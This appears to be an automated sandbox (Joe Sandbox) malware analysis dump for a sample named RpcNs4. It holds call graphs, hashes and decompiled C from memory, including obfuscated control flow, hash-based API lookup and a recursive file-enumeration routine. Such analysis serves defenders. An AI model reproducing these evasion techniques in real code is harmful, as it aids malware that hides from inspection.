GetPEB 21768->21783 21771 20b4b42 21771->21764 21773 20b4b97 21785 20b3dd0 GetPEB 21773->21785 21776 20b4bcd 21774->21776 21786 20b3e70 GetPEB 21774->21786 21778 20b4bc1 21787 20b3dd0 GetPEB 21778->21787 21780->21762 21781->21759 21782->21768 21783->21771 21784->21773 21785->21774 21786->21778 21787->21776 21788 402aec 21826 406001 21788->21826 21790 402af1 ___unDName 21830 4063b1 GetStartupInfoW 21790->21830 21792 402b07 21832 40408a GetProcessHeap 21792->21832 21794 402b5f 21795 402b6a 21794->21795 21925 402c8c 58 API calls 3 library calls 21794->21925 21833 40435e 21795->21833 21798 402b70 21799 402b7b __RTC_Initialize 21798->21799 21926 402c8c 58 API calls 3 library calls 21798->21926 21854 405991 21799->21854 21802 402b8a 21803 402b96 GetCommandLineA 21802->21803 21927 402c8c 58 API calls 3 library calls 21802->21927 21873 4060dd GetEnvironmentStringsW 21803->21873 21806 402b95 21806->21803 21810 402bbb 21897 405ed3 21810->21897 21814 402bcc 21913 403a75 21814->21913 21817 402bd4 21818 402bdf 21817->21818 21930 403a3b 58 API calls 3 library calls 21817->21930 21919 4067ca 21818->21919 21821 402c02 21932 403a66 58 API calls _doexit 21821->21932 21822 402be5 21822->21821 21931 403d4a 58 API calls _doexit 21822->21931 21825 402c07 ___unDName 21827 406031 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 21826->21827 21828 406024 21826->21828 21829 406028 21827->21829 21828->21827 21828->21829 21829->21790 21831 4063c7 21830->21831 21831->21792 21832->21794 21933 403b79 RtlEncodePointer 21833->21933 21835 404363 21939 406eac InitializeCriticalSectionAndSpinCount __alloc_osfhnd 21835->21939 21837 404368 21838 40436c 21837->21838 21941 4062a5 TlsAlloc 21837->21941 21940 4043d4 61 API calls 2 library calls 21838->21940 21841 404371 21841->21798 21842 40437e 21842->21838 21843 404389 21842->21843 21942 40cff1 21843->21942 21845 404396 21846 4043cb 21845->21846 21948 406301 TlsSetValue 21845->21948 21950 4043d4 61 API calls 2 library calls 21846->21950 21849 4043d0 21849->21798 21850 4043aa 21850->21846 21851 4043b0 21850->21851 21949 4042ab 58 API calls 4 library calls 21851->21949 21853 4043b8 GetCurrentThreadId 21853->21798 21855 40599d ___unDName 21854->21855 21964 406d5b 21855->21964 21857 4059a4 21858 40cff1 __calloc_crt 58 API calls 21857->21858 21860 4059b5 21858->21860 21859 405a20 GetStartupInfoW 21867 405a35 21859->21867 21870 405b64 21859->21870 21860->21859 21861 4059c0 ___unDName @_EH4_CallFilterFunc@8 21860->21861 21861->21802 21862 405c2c 21973 405c3c LeaveCriticalSection _doexit 21862->21973 21864 40cff1 __calloc_crt 58 API calls 21864->21867 21865 405bb1 GetStdHandle 21865->21870 21866 405bc4 GetFileType 21866->21870 21867->21864 21868 405a83 21867->21868 21867->21870 21869 405ab7 GetFileType 21868->21869 21868->21870 21971 4063ec InitializeCriticalSectionAndSpinCount 21868->21971 21869->21868 21870->21862 21870->21865 21870->21866 21972 4063ec InitializeCriticalSectionAndSpinCount 21870->21972 21874 4060f0 WideCharToMultiByte 21873->21874 21875 402ba6 21873->21875 21877 406123 21874->21877 21878 40615a FreeEnvironmentStringsW 21874->21878 21886 405ca4 21875->21886 21976 40d039 58 API calls 2 library calls 21877->21976 21878->21875 21880 406129 21880->21878 21881 406130 WideCharToMultiByte 21880->21881 21882 406146 21881->21882 21883 40614f FreeEnvironmentStringsW 21881->21883 21977 402cb3 58 API calls 2 library calls 21882->21977 21883->21875 21885 40614c 21885->21883 21887 405cb2 21886->21887 21888 405cb7 GetModuleFileNameA 21886->21888 21984 40d993 70 API calls __setmbcp 21887->21984 21890 405ce4 21888->21890 21978 405d57 21890->21978 21892 402bb0 21892->21810 21928 403a3b 58 API calls 3 library calls 21892->21928 21895 405d1d 21895->21892 21896 405d57 _parse_cmdline 58 API calls 21895->21896 21896->21892 21898 405edc 21897->21898 21900 405ee1 _strlen 21897->21900 21988 40d993 70 API calls __setmbcp 21898->21988 21901 40cff1 __calloc_crt 58 API calls 21900->21901 21904 402bc1 21900->21904 21909 405f17 _strlen 21901->21909 21902 405f69 21990 402cb3 58 API calls 2 library calls 21902->21990 21904->21814 21929 403a3b 58 API calls 3 library calls 21904->21929 21905 40cff1 __calloc_crt 58 API calls 21905->21909 21906 405f90 21991 402cb3 58 API calls 2 library calls 21906->21991 21909->21902 21909->21904 21909->21905 21909->21906 21910 405fa7 21909->21910 21989 406c6e 58 API calls 2 library calls 21909->21989 21992 406c1e 8 API calls 2 library calls 21910->21992 21912 405fb3 21915 403a81 __IsNonwritableInCurrentImage 21913->21915 21993 40d14f 21915->21993 21916 403a9f __initterm_e 21918 403abe _doexit __IsNonwritableInCurrentImage 21916->21918 21996 40cfdc 67 API calls __cinit 21916->21996 21918->21817 21920 4067d6 21919->21920 21922 4067db 21919->21922 21997 40d993 70 API calls __setmbcp 21920->21997 21924 406819 21922->21924 21998 40f5db 58 API calls x_ismbbtype_l 21922->21998 21924->21822 21925->21795 21926->21799 21927->21806 21931->21821 21932->21825 21951 40370d 21933->21951 21935 403b8a __init_pointers __initp_misc_winsig 21952 4044cb EncodePointer 21935->21952 21937 403ba2 __init_pointers 21938 40645a 34 API calls 21937->21938 21938->21835 21939->21837 21940->21841 21941->21842 21945 40cff8 21942->21945 21944 40d033 21944->21845 21945->21944 21947 40d016 21945->21947 21953 40f9fa 21945->21953 21947->21944 21947->21945 21961 406777 Sleep 21947->21961 21948->21850 21949->21853 21950->21849 21951->21935 21952->21937 21954 40fa05 21953->21954 21958 40fa20 21953->21958 21955 40fa11 21954->21955 21954->21958 21962 403fac 58 API calls __getptd_noexit 21955->21962 21956 40fa30 RtlAllocateHeap 21956->21958 21959 40fa16 21956->21959 21958->21956 21958->21959 21963 4036e7 DecodePointer 21958->21963 21959->21945 21961->21947 21962->21959 21963->21958 21965 406d6c 21964->21965 21966 406d7f EnterCriticalSection 21964->21966 21974 406e03 58 API calls 10 library calls 21965->21974 21966->21857 21968 406d72 21968->21966 21975 403a3b 58 API calls 3 library calls 21968->21975 21971->21868 21972->21870 21973->21861 21974->21968 21976->21880 21977->21885 21980 405d79 21978->21980 21983 405ddd 21980->21983 21986 40f5db 58 API calls x_ismbbtype_l 21980->21986 21981 405cfa 21981->21892 21985 40d039 58 API calls 2 library calls 21981->21985 21983->21981 21987 40f5db 58 API calls x_ismbbtype_l 21983->21987 21984->21888 21985->21895 21986->21980 21987->21983 21988->21900 21989->21909 21990->21904 21991->21904 21992->21912 21994 40d152 EncodePointer 21993->21994 21994->21994 21995 40d16c 21994->21995 21995->21916 21996->21918 21997->21922 21998->21922

                                                                                                      Executed Functions

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 95 20b3890-20b38ab 96 20b38b0-20b38b5 95->96 97 20b38bb 96->97 98 20b3a09-20b3a0e 96->98 101 20b38c1-20b38c6 97->101 102 20b3b10-20b3b17 97->102 99 20b3a6c-20b3a7f call 20b3460 98->99 100 20b3a10-20b3a15 98->100 120 20b3a9c-20b3ab7 99->120 121 20b3a81-20b3a97 call 20b3e70 call 20b3dd0 99->121 106 20b3a17-20b3a1e 100->106 107 20b3a56-20b3a5b 100->107 104 20b38cc-20b38d1 101->104 105 20b39c1-20b39c8 101->105 108 20b3b19-20b3b2f call 20b3e70 call 20b3dd0 102->108 109 20b3b34-20b3b35 FindClose 102->109 111 20b39b7-20b39bc 104->111 112 20b38d7-20b38dc 104->112 117 20b39ca-20b39e0 call 20b3e70 call 20b3dd0 105->117 118 20b39e5-20b39f9 FindFirstFileW 105->118 114 20b3a3b-20b3a51 FindNextFileW 106->114 115 20b3a20-20b3a36 call 20b3e70 call 20b3dd0 106->115 107->96 119 20b3a61-20b3a6b 107->119 108->109 113 20b3b37-20b3b41 109->113 111->96 112->107 122 20b38e2-20b38e7 112->122 114->96 115->114 117->118 118->113 123 20b39ff-20b3a04 118->123 146 20b3ab9-20b3acf call 20b3e70 call 20b3dd0 120->146 147 20b3ad4-20b3adf 120->147 121->120 128 20b38ed-20b38f3 122->128 129 20b3991-20b39b2 122->129 123->96 135 20b38f5-20b38fd 128->135 136 20b3914-20b3916 128->136 129->96 142 20b38ff-20b3903 135->142 143 20b390d-20b3912 135->143 136->143 144 20b3918-20b392b call 20b3460 136->144 142->136 150 20b3905-20b390b 142->150 143->96 158 20b3948-20b3978 call 20b3890 144->158 159 20b392d-20b3943 call 20b3e70 call 20b3dd0 144->159 146->147 156 20b3afc-20b3b0b 147->156 157 20b3ae1-20b3af7 call 20b3e70 call 20b3dd0 147->157 150->136 150->143 156->96 157->156 172 20b397d-20b398c call 20b3400 158->172 159->158 172->96
                                                                                                      C-Code - Quality: 73%
                                                                                                      			E020B3890(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                      				short _v524;
                                                                                                      				char _v1044;
                                                                                                      				short _v1588;
                                                                                                      				intOrPtr _v1590;
                                                                                                      				struct _WIN32_FIND_DATAW _v1636;
                                                                                                      				void* _v1640;
                                                                                                      				intOrPtr _v1652;
                                                                                                      				void* __ebx;
                                                                                                      				void* __ebp;
                                                                                                      				void* _t22;
                                                                                                      				intOrPtr* _t24;
                                                                                                      				intOrPtr* _t26;
                                                                                                      				intOrPtr* _t28;
                                                                                                      				signed int _t34;
                                                                                                      				int _t40;
                                                                                                      				void* _t44;
                                                                                                      				signed int _t48;
                                                                                                      				intOrPtr* _t52;
                                                                                                      				intOrPtr _t57;
                                                                                                      				void* _t58;
                                                                                                      				void* _t93;
                                                                                                      				void* _t94;
                                                                                                      				void* _t95;
                                                                                                      				void* _t96;
                                                                                                      				void* _t97;
                                                                                                      				void* _t98;
                                                                                                      				void* _t100;
                                                                                                      
                                                                                                      				_t93 = __ecx;
                                                                                                      				_t97 = __edx;
                                                                                                      				_v1640 = __ecx;
                                                                                                      				_t22 = 0x60b2083;
                                                                                                      				_t58 = _v1640;
                                                                                                      				while(1) {
                                                                                                      					L1:
                                                                                                      					_t100 = _t22 - 0xd2b506a;
                                                                                                      					if(_t100 > 0) {
                                                                                                      						break;
                                                                                                      					}
                                                                                                      					if(_t100 == 0) {
                                                                                                      						if( *0x20bde50 == 0) {
                                                                                                      							 *0x20bde50 = E020B3DD0(_t58, E020B3E70(0xbb51e2dc), 0x845670b3, _t97);
                                                                                                      						}
                                                                                                      						_t40 = FindClose(_t58); // executed
                                                                                                      						return _t40;
                                                                                                      					}
                                                                                                      					if(_t22 == 0x14d466) {
                                                                                                      						if( *0x20be320 == 0) {
                                                                                                      							 *0x20be320 = E020B3DD0(_t58, E020B3E70(0xbb51e2dc), 0xd5cde728, _t97);
                                                                                                      						}
                                                                                                      						_t44 = FindFirstFileW( &_v524,  &_v1636); // executed
                                                                                                      						_t58 = _t44;
                                                                                                      						if(_t58 == 0xffffffff) {
                                                                                                      							return _t44;
                                                                                                      						} else {
                                                                                                      							_t22 = 0x635dcc3;
                                                                                                      							continue;
                                                                                                      						}
                                                                                                      					} else {
                                                                                                      						if(_t22 == 0x60b2083) {
                                                                                                      							_t22 = 0x20f09625;
                                                                                                      							continue;
                                                                                                      						} else {
                                                                                                      							if(_t22 != 0x635dcc3) {
                                                                                                      								L27:
                                                                                                      								if(_t22 != 0xf0a8a83) {
                                                                                                      									continue;
                                                                                                      								} else {
                                                                                                      									return _t22;
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                                                                                      									_t48 = _a4( &_v1636, _a8);
                                                                                                      									asm("sbb eax, eax");
                                                                                                      									_t22 = ( ~_t48 & 0x2a8f2359) + 0xd2b506a;
                                                                                                      								} else {
                                                                                                      									if(_v1636.cFileName != 0x2e) {
                                                                                                      										L12:
                                                                                                      										if(_t97 == 0) {
                                                                                                      											goto L11;
                                                                                                      										} else {
                                                                                                      											_t96 = E020B3460(0x20bd310);
                                                                                                      											_t52 =  *0x20bdf10;
                                                                                                      											if(_t52 == 0) {
                                                                                                      												_t52 = E020B3DD0(_t58, E020B3E70(0xe60124ba), 0xec538b3a, _t97);
                                                                                                      												 *0x20bdf10 = _t52;
                                                                                                      											}
                                                                                                      											 *_t52( &_v1044, 0x104, _t96, _t93,  &(_v1636.cFileName));
                                                                                                      											E020B3890( &_v1044, _t97, _a4, _a8);
                                                                                                      											_t98 = _t98 + 0x1c;
                                                                                                      											E020B3400(_t96);
                                                                                                      											_t22 = 0x37ba73c3;
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										_t57 = _v1590;
                                                                                                      										if(_t57 == 0 || _t57 == 0x2e && _v1588 == 0) {
                                                                                                      											L11:
                                                                                                      											_t22 = 0x37ba73c3;
                                                                                                      										} else {
                                                                                                      											goto L12;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      								continue;
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      					L40:
                                                                                                      				}
                                                                                                      				if(_t22 == 0x20f09625) {
                                                                                                      					_t95 = E020B3460(0x20bd2e0);
                                                                                                      					_t24 =  *0x20bdf10;
                                                                                                      					if(_t24 == 0) {
                                                                                                      						_t24 = E020B3DD0(_t58, E020B3E70(0xe60124ba), 0xec538b3a, _t97);
                                                                                                      						 *0x20bdf10 = _t24;
                                                                                                      					}
                                                                                                      					 *_t24( &_v524, 0x104, _t95, _t93);
                                                                                                      					_t26 =  *0x20bddc8;
                                                                                                      					_t98 = _t98 + 0x10;
                                                                                                      					if(_t26 == 0) {
                                                                                                      						_t26 = E020B3DD0(_t58, E020B3E70(0xbb51e2dc), 0x298e8809, _t97);
                                                                                                      						 *0x20bddc8 = _t26;
                                                                                                      					}
                                                                                                      					_t94 =  *_t26();
                                                                                                      					_t28 =  *0x20bdbec;
                                                                                                      					if(_t28 == 0) {
                                                                                                      						_t28 = E020B3DD0(_t58, E020B3E70(0xbb51e2dc), 0x632f374, _t97);
                                                                                                      						 *0x20bdbec = _t28;
                                                                                                      					}
                                                                                                      					 *_t28(_t94, 0, _t95);
                                                                                                      					_t93 = _v1652;
                                                                                                      					_t22 = 0x14d466;
                                                                                                      					goto L1;
                                                                                                      				} else {
                                                                                                      					if(_t22 != 0x37ba73c3) {
                                                                                                      						goto L27;
                                                                                                      					} else {
                                                                                                      						if( *0x20bdd64 == 0) {
                                                                                                      							 *0x20bdd64 = E020B3DD0(_t58, E020B3E70(0xbb51e2dc), 0xf3180d23, _t97);
                                                                                                      						}
                                                                                                      						_t34 = FindNextFileW(_t58,  &_v1636); // executed
                                                                                                      						asm("sbb eax, eax");
                                                                                                      						_t22 = ( ~_t34 & 0xf90a8c59) + 0xd2b506a;
                                                                                                      						goto L1;
                                                                                                      					}
                                                                                                      				}
                                                                                                      				goto L40;
                                                                                                      			}






























                                                                                                      0x020b389a
                                                                                                      0x020b389c
                                                                                                      0x020b389e
                                                                                                      0x020b38a2
                                                                                                      0x020b38a7
                                                                                                      0x020b38b0
                                                                                                      0x020b38b0
                                                                                                      0x020b38b0
                                                                                                      0x020b38b5
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b38bb
                                                                                                      0x020b3b17
                                                                                                      0x020b3b2f
                                                                                                      0x020b3b2f
                                                                                                      0x020b3b35
                                                                                                      0x00000000
                                                                                                      0x020b3b35
                                                                                                      0x020b38c6
                                                                                                      0x020b39c8
                                                                                                      0x020b39e0
                                                                                                      0x020b39e0
                                                                                                      0x020b39f2
                                                                                                      0x020b39f4
                                                                                                      0x020b39f9
                                                                                                      0x020b3b41
                                                                                                      0x020b39ff
                                                                                                      0x020b39ff
                                                                                                      0x00000000
                                                                                                      0x020b39ff
                                                                                                      0x020b38cc
                                                                                                      0x020b38d1
                                                                                                      0x020b39b7
                                                                                                      0x00000000
                                                                                                      0x020b38d7
                                                                                                      0x020b38dc
                                                                                                      0x020b3a56
                                                                                                      0x020b3a5b
                                                                                                      0x00000000
                                                                                                      0x020b3a6b
                                                                                                      0x020b3a6b
                                                                                                      0x020b3a6b
                                                                                                      0x020b38e2
                                                                                                      0x020b38e7
                                                                                                      0x020b399d
                                                                                                      0x020b39a6
                                                                                                      0x020b39ad
                                                                                                      0x020b38ed
                                                                                                      0x020b38f3
                                                                                                      0x020b3914
                                                                                                      0x020b3916
                                                                                                      0x00000000
                                                                                                      0x020b3918
                                                                                                      0x020b3922
                                                                                                      0x020b3924
                                                                                                      0x020b392b
                                                                                                      0x020b393e
                                                                                                      0x020b3943
                                                                                                      0x020b3943
                                                                                                      0x020b395c
                                                                                                      0x020b3978
                                                                                                      0x020b397d
                                                                                                      0x020b3982
                                                                                                      0x020b3987
                                                                                                      0x020b3987
                                                                                                      0x020b38f5
                                                                                                      0x020b38f5
                                                                                                      0x020b38fd
                                                                                                      0x020b390d
                                                                                                      0x020b390d
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b38fd
                                                                                                      0x020b38f3
                                                                                                      0x00000000
                                                                                                      0x020b38e7
                                                                                                      0x020b38dc
                                                                                                      0x020b38d1
                                                                                                      0x00000000
                                                                                                      0x020b38c6
                                                                                                      0x020b3a0e
                                                                                                      0x020b3a76
                                                                                                      0x020b3a78
                                                                                                      0x020b3a7f
                                                                                                      0x020b3a92
                                                                                                      0x020b3a97
                                                                                                      0x020b3a97
                                                                                                      0x020b3aab
                                                                                                      0x020b3aad
                                                                                                      0x020b3ab2
                                                                                                      0x020b3ab7
                                                                                                      0x020b3aca
                                                                                                      0x020b3acf
                                                                                                      0x020b3acf
                                                                                                      0x020b3ad6
                                                                                                      0x020b3ad8
                                                                                                      0x020b3adf
                                                                                                      0x020b3af2
                                                                                                      0x020b3af7
                                                                                                      0x020b3af7
                                                                                                      0x020b3b00
                                                                                                      0x020b3b02
                                                                                                      0x020b3b06
                                                                                                      0x00000000
                                                                                                      0x020b3a10
                                                                                                      0x020b3a15
                                                                                                      0x00000000
                                                                                                      0x020b3a17
                                                                                                      0x020b3a1e
                                                                                                      0x020b3a36
                                                                                                      0x020b3a36
                                                                                                      0x020b3a41
                                                                                                      0x020b3a45
                                                                                                      0x020b3a4c
                                                                                                      0x00000000
                                                                                                      0x020b3a4c
                                                                                                      0x020b3a15
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 020B39F2
                                                                                                      • FindNextFileW.KERNELBASE(?,?,00000000,0000BD1A,?,00000001), ref: 020B3A41
                                                                                                      • FindClose.KERNELBASE(?), ref: 020B3B35
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                      • String ID: .$jP+
                                                                                                      • API String ID: 3541575487-2294543394
                                                                                                      • Opcode ID: 62aba54455608884a076cc10aa09650411499db950486a613aee45c2ad6e82b3
                                                                                                      • Instruction ID: 4920664bef6e13f89de4918a0261ab2e3b851fc73ce3cb483bebd3e1ec39952f
                                                                                                      • Opcode Fuzzy Hash: 62aba54455608884a076cc10aa09650411499db950486a613aee45c2ad6e82b3
                                                                                                      • Instruction Fuzzy Hash: 38512474B4830187DB37AB749884AFFB2E6AF85244F3009A9E551C7280EB75DC05AB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 176 401880-4018dd call 4025d7 179 4018e0-4018eb 176->179 179->179 180 4018ed-401919 LoadLibraryA GetProcAddress 179->180 181 40191c-40191e 180->181 182 401920-40192e call 4023ff 181->182 183 40192f-401951 call 4023ff 181->183
                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 004018D3
                                                                                                        • Part of subcall function 004025D7: __FF_MSGBANNER.LIBCMT ref: 004025EE
                                                                                                        • Part of subcall function 004025D7: __NMSG_WRITE.LIBCMT ref: 004025F5
                                                                                                        • Part of subcall function 004025D7: RtlAllocateHeap.NTDLL(00610000,00000000,00000001,00000000,00000000,00000000,?,0040D04F,00000000,00000000,00000000,00000000,?,00406E45,00000018,00434500), ref: 0040261A
                                                                                                      • LoadLibraryA.KERNELBASE(ADVAPI32.DLL,00000000), ref: 004018F8
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004018FF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressAllocateHeapLibraryLoadProc_malloc
                                                                                                      • String ID: ADVAPI32.DLL
                                                                                                      • API String ID: 4139351243-33758204
                                                                                                      • Opcode ID: 670f09e3d8b638425d01283d12b95ed64893a93a4cb3760ffa5b5eff12202f68
                                                                                                      • Instruction ID: 77864cb31303051aa4bb0e4ba01d51cb444543d451e6ae4c272d0dd7b7c99e89
                                                                                                      • Opcode Fuzzy Hash: 670f09e3d8b638425d01283d12b95ed64893a93a4cb3760ffa5b5eff12202f68
                                                                                                      • Instruction Fuzzy Hash: E6212631E5038895EB10DFA8AD47BFDBB74AF49700F50127AED85BA1C1EAB45648C3D8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 95%
                                                                                                      			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                      				intOrPtr _t17;
                                                                                                      				void* _t18;
                                                                                                      				void* _t19;
                                                                                                      				intOrPtr _t23;
                                                                                                      				void* _t24;
                                                                                                      				void* _t25;
                                                                                                      				void* _t26;
                                                                                                      				intOrPtr _t28;
                                                                                                      				signed int _t39;
                                                                                                      				void* _t49;
                                                                                                      				signed int _t52;
                                                                                                      				void* _t54;
                                                                                                      				void* _t56;
                                                                                                      
                                                                                                      				_t50 = __edi;
                                                                                                      				_t49 = __edx;
                                                                                                      				E00406001();
                                                                                                      				_push(0x14);
                                                                                                      				_push(0x434230);
                                                                                                      				E00406830(__ebx, __edi, __esi);
                                                                                                      				_t52 = E004063B1() & 0x0000ffff;
                                                                                                      				E00405FB4(2);
                                                                                                      				_t56 =  *0x400000 - 0x5a4d; // 0x5a4d
                                                                                                      				if(_t56 == 0) {
                                                                                                      					_t17 =  *0x40003c; // 0xf8
                                                                                                      					__eflags =  *((intOrPtr*)(_t17 + 0x400000)) - 0x4550;
                                                                                                      					if( *((intOrPtr*)(_t17 + 0x400000)) != 0x4550) {
                                                                                                      						goto L2;
                                                                                                      					} else {
                                                                                                      						__eflags =  *((intOrPtr*)(_t17 + 0x400018)) - 0x10b;
                                                                                                      						if( *((intOrPtr*)(_t17 + 0x400018)) != 0x10b) {
                                                                                                      							goto L2;
                                                                                                      						} else {
                                                                                                      							_t39 = 0;
                                                                                                      							__eflags =  *((intOrPtr*)(_t17 + 0x400074)) - 0xe;
                                                                                                      							if( *((intOrPtr*)(_t17 + 0x400074)) > 0xe) {
                                                                                                      								__eflags =  *(_t17 + 0x4000e8);
                                                                                                      								_t6 =  *(_t17 + 0x4000e8) != 0;
                                                                                                      								__eflags = _t6;
                                                                                                      								_t39 = 0 | _t6;
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      				} else {
                                                                                                      					L2:
                                                                                                      					_t39 = 0;
                                                                                                      				}
                                                                                                      				 *(_t54 - 0x1c) = _t39;
                                                                                                      				_t18 = E0040408A();
                                                                                                      				_t57 = _t18;
                                                                                                      				if(_t18 == 0) {
                                                                                                      					E00402C8C(0x1c);
                                                                                                      				}
                                                                                                      				_t19 = E0040435E(_t39, _t50, _t57);
                                                                                                      				_t58 = _t19;
                                                                                                      				if(_t19 == 0) {
                                                                                                      					_t19 = E00402C8C(0x10);
                                                                                                      				}
                                                                                                      				E0040609D(_t19);
                                                                                                      				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
                                                                                                      				if(E00405991(_t39, _t50, _t52, _t58) < 0) {
                                                                                                      					E00402C8C(0x1b);
                                                                                                      				}
                                                                                                      				 *0x438c14 = GetCommandLineA(); // executed
                                                                                                      				_t23 = E004060DD(_t49); // executed
                                                                                                      				 *0x4369bc = _t23;
                                                                                                      				_t24 = E00405CA4();
                                                                                                      				_t60 = _t24;
                                                                                                      				if(_t24 < 0) {
                                                                                                      					E00403A3B(_t39, _t49, _t50, _t52, _t60, 8);
                                                                                                      				}
                                                                                                      				_t25 = E00405ED3(_t39, _t49, _t50, _t52);
                                                                                                      				_t61 = _t25;
                                                                                                      				if(_t25 < 0) {
                                                                                                      					E00403A3B(_t39, _t49, _t50, _t52, _t61, 9);
                                                                                                      				}
                                                                                                      				_t26 = E00403A75(1);
                                                                                                      				_t62 = _t26;
                                                                                                      				if(_t26 != 0) {
                                                                                                      					E00403A3B(_t39, _t49, _t50, _t52, _t62, _t26);
                                                                                                      				}
                                                                                                      				_t28 = L0040105F(_t62, 0x400000, 0, E004067CA(), _t52); // executed
                                                                                                      				_t53 = _t28;
                                                                                                      				 *((intOrPtr*)(_t54 - 0x24)) = _t28;
                                                                                                      				if(_t39 == 0) {
                                                                                                      					E00403D4A(_t53);
                                                                                                      				}
                                                                                                      				E00403A66();
                                                                                                      				 *(_t54 - 4) = 0xfffffffe;
                                                                                                      				return E00406875(_t53);
                                                                                                      			}
















                                                                                                      0x00402aec
                                                                                                      0x00402aec
                                                                                                      0x00402aec
                                                                                                      0x00402af6
                                                                                                      0x00402af8
                                                                                                      0x00402afd
                                                                                                      0x00402b07
                                                                                                      0x00402b0c
                                                                                                      0x00402b17
                                                                                                      0x00402b1e
                                                                                                      0x00402b24
                                                                                                      0x00402b29
                                                                                                      0x00402b33
                                                                                                      0x00000000
                                                                                                      0x00402b35
                                                                                                      0x00402b3a
                                                                                                      0x00402b41
                                                                                                      0x00000000
                                                                                                      0x00402b43
                                                                                                      0x00402b43
                                                                                                      0x00402b45
                                                                                                      0x00402b4c
                                                                                                      0x00402b4e
                                                                                                      0x00402b54
                                                                                                      0x00402b54
                                                                                                      0x00402b54
                                                                                                      0x00402b54
                                                                                                      0x00402b4c
                                                                                                      0x00402b41
                                                                                                      0x00402b20
                                                                                                      0x00402b20
                                                                                                      0x00402b20
                                                                                                      0x00402b20
                                                                                                      0x00402b57
                                                                                                      0x00402b5a
                                                                                                      0x00402b5f
                                                                                                      0x00402b61
                                                                                                      0x00402b65
                                                                                                      0x00402b6a
                                                                                                      0x00402b6b
                                                                                                      0x00402b70
                                                                                                      0x00402b72
                                                                                                      0x00402b76
                                                                                                      0x00402b7b
                                                                                                      0x00402b7c
                                                                                                      0x00402b81
                                                                                                      0x00402b8c
                                                                                                      0x00402b90
                                                                                                      0x00402b95
                                                                                                      0x00402b9c
                                                                                                      0x00402ba1
                                                                                                      0x00402ba6
                                                                                                      0x00402bab
                                                                                                      0x00402bb0
                                                                                                      0x00402bb2
                                                                                                      0x00402bb6
                                                                                                      0x00402bbb
                                                                                                      0x00402bbc
                                                                                                      0x00402bc1
                                                                                                      0x00402bc3
                                                                                                      0x00402bc7
                                                                                                      0x00402bcc
                                                                                                      0x00402bcf
                                                                                                      0x00402bd5
                                                                                                      0x00402bd7
                                                                                                      0x00402bda
                                                                                                      0x00402bdf
                                                                                                      0x00402bee
                                                                                                      0x00402bf3
                                                                                                      0x00402bf5
                                                                                                      0x00402bfa
                                                                                                      0x00402bfd
                                                                                                      0x00402bfd
                                                                                                      0x00402c02
                                                                                                      0x00402c37
                                                                                                      0x00402c45

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __amsg_exit_fast_error_exit$___crt$CommandEnvironmentInfoInitializeLineModeShowStartupStringsWindow___security_init_cookie__cinit__ioinit__setargv__setenvp__wincmdln
                                                                                                      • String ID: 3a$.$
                                                                                                      • API String ID: 722230336-2632520786
